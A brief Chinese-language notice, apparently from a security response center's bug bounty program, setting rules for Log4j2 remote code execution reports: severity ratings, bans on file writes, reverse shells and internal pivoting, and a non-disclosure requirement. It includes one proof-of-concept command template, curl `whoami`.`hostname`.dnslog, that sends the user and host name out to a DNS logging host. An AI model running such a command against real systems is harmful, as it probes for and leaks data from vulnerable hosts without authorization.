关于开始接收Log4j2远程代码执行漏洞的通知二

1、发现目标存在log4j漏洞后，其评级标准：
证明能执行命令为高危，参照格式curl `whoami`.`hostname`.dnslog；证明通过${hostName}获取hostname的为低危。
2、不允许测试过程中进行写入文件、反弹shell、内网渗透等恶意操作，否则该行为视为违规，情节严重者将追究法律责任。更多细节请参考《src行业安全测试规范》。
3、在漏洞未经修复前，严禁对外披露漏洞详情，否则将取消所有奖励。
4、漏洞等级会按照漏洞实际影响和危害会进行调整。
5、Apache Log4j2漏洞不参与任何活动，包括但不限于主打产品、积分翻倍、年度季度奖励等。